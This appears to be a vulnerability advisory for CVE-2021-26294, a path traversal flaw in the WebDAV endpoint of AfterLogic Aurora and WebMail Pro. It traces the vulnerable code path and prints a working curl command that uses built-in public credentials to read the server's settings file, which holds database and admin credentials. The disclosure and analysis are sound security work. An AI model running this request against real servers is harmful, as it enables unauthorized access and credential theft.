CVE-2021-26294 - Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint
Base Score: 7.5 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Directory Traversal, Public Built-in Credentials For Critical Function
https://owasp.org/www-community/attacks/Path_Traversal
- Emre KELEŞ - @emrekeles on twitter
- Emircan YILDIZ - @scorpsec on twitter
- Halil Emre ÖZEN - @halilemreozen on twitter
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
Read any file with the following curl command
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"The sample curl command will get the license key, database credentials, admin panel credentials, etc
- dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
- \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to * invokeMethod)
- \libraries\Sabre\DAV\server.php -> invokeMethod
- \libraries\Sabre\DAV\server.php -> httpGet
Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension when it’s combined the httpGet business login ( reading file content and returning ) the attacker able to read any file under the webroot.
With the above problem any loggable user can read configuration files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.